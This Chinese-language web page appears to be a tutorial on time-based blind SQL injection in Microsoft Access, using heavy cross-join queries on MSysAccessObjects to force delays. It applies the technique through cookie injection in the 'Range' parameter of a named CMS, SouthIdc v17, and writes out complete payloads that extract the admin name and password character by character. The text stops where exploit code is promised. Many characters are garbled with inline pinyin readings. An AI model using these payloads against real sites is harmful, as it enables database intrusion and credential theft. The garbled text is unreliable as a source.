推薦：關(guān)閉Access2010數(shù)據(jù)庫(kù)默認(rèn)輸入法的方法
1.打開Access2010，點(diǎn)擊開始選項(xiàng)卡，選擇選項(xiàng) 2.在打開的Access選項(xiàng)窗口中，在左邊的菜單中選擇客戶端設(shè)置，在右邊的窗口中將數(shù)據(jù)表IME控件勾選，確定即可，相關(guān)截圖如下所示：

 　　Access是微軟把數(shù)據(jù)庫(kù)引擎的圖形用戶界面和軟件開發(fā)工具結(jié)合在一起的一個(gè)數(shù)據(jù)庫(kù)管理系統(tǒng)。本文我們來看看Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄。

　　概述

　　眾所周知，access數(shù)據(jù)庫(kù)是不支持基于時(shí)間的盲注方式，但是我們可以利用access的系統(tǒng)表MSysAccessObjects，通過多負(fù)荷查詢(Heavy Queries)的方式實(shí)現(xiàn)。

　　初步探究

　　我們以SouthIdcv17數(shù)據(jù)庫(kù)為例

　　執(zhí)行 select * from Southidc_About ，返回結(jié)果如下圖。

　　如何實(shí)現(xiàn)time base injection 呢?我們就要利用這條語句

　　SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

　　具體實(shí)現(xiàn)方式如下：

　　select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

　　Southidc_Admin)=97

　　我們可以執(zhí)行一次，觀察效果。

　　很明顯，經(jīng)歷了大約40s才返回結(jié)果

　　當(dāng)我們執(zhí)行如下語句時(shí),也就是把最后的97改為96

　　select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

　　Southidc_Admin)=96

　　很快就執(zhí)行完畢，沒有延時(shí)。

　　很明顯，我們通過where條件后的

　　(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

　　實(shí)現(xiàn)了延時(shí)，但需要注意的是這里where后的條件是有順序的，實(shí)現(xiàn)延時(shí)的語句必須在

　　1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

　　之前，為什么呢?實(shí)驗(yàn)得出的結(jié)論。

　　實(shí)例實(shí)現(xiàn)

　　在SouthIdc 17 中，有一處sql注入漏洞，但是常規(guī)的方法并不能成功利用漏洞。漏洞代碼如下：

　　雖然程序把Post和Get的數(shù)據(jù)進(jìn)行了過濾，但是我們依舊我可以通過Cookie的提交方式進(jìn)行注入。

　　好，我們實(shí)現(xiàn)一下注入利用。

　　我們需要注入的語句為：

　　select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

　　通過提交cookie

　　Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

　　ParentID為程序上部傳進(jìn)的值，最終的語句為：

　　1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

　　我們可以在查詢器中看一下效果

　　96時(shí)，不延時(shí)，如圖:

　　97時(shí)延時(shí)，效果如下圖：

　　接下來，我們可以利用上述語句進(jìn)行exp的編寫，筆者這里用python

　　核心代碼如下：

分享：IIS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法
對(duì)于ASP+Access開發(fā)的網(wǎng)站，安全性最最讓人擔(dān)憂的就是Access數(shù)據(jù)庫(kù)可以隨意下載，當(dāng)然我們可以通過一些修改數(shù)據(jù)庫(kù)名稱的手段進(jìn)行盡量的防護(hù)，但歸根結(jié)底是不徹底的。所以今天就來談?wù)勗贗IS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法。 此方法需要你有IIS的管理權(quán)